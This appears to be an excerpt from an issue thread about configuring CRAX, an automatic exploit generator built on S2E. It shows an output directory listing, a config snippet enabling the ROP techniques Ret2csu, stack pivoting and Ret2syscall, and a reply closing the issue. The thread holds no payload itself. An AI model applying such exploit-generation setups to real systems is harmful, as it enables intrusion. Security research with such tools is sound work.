guestfs          s2e-out-1           s2e-out-21  s2e-out-7
launch-crax.sh      s2e-out-10           s2e-out-22  s2e-out-8
launch-s2e.sh      s2e-out-11           s2e-out-23  s2e-out-9
ld-2.24.so      s2e-out-12           s2e-out-24  serial.txt
libc-2.24.so      s2e-out-13           s2e-out-25  set-target.sh
library.lua      s2e-out-14           s2e-out-26  sym_stdin
models.lua      s2e-out-15           s2e-out-27  target
poc          s2e-out-16           s2e-out-28
$
[*] Interrupted
[*] Stopped process './ld-2.24.so' (pid 743870)

Here are the techniques I used. (Edit s2e-config.template.lua)

-- The exploitaion techniques that your exploit will use
    techniques = {
        "Ret2csu",
        "BasicStackPivoting",
        "Ret2syscall",
    },

Answer 3 · 2023-03-13T00:28:21.000Z

@aesophor Thank you a lot for your response! I have also confirmed to work perfectly now.

I'll close the issue.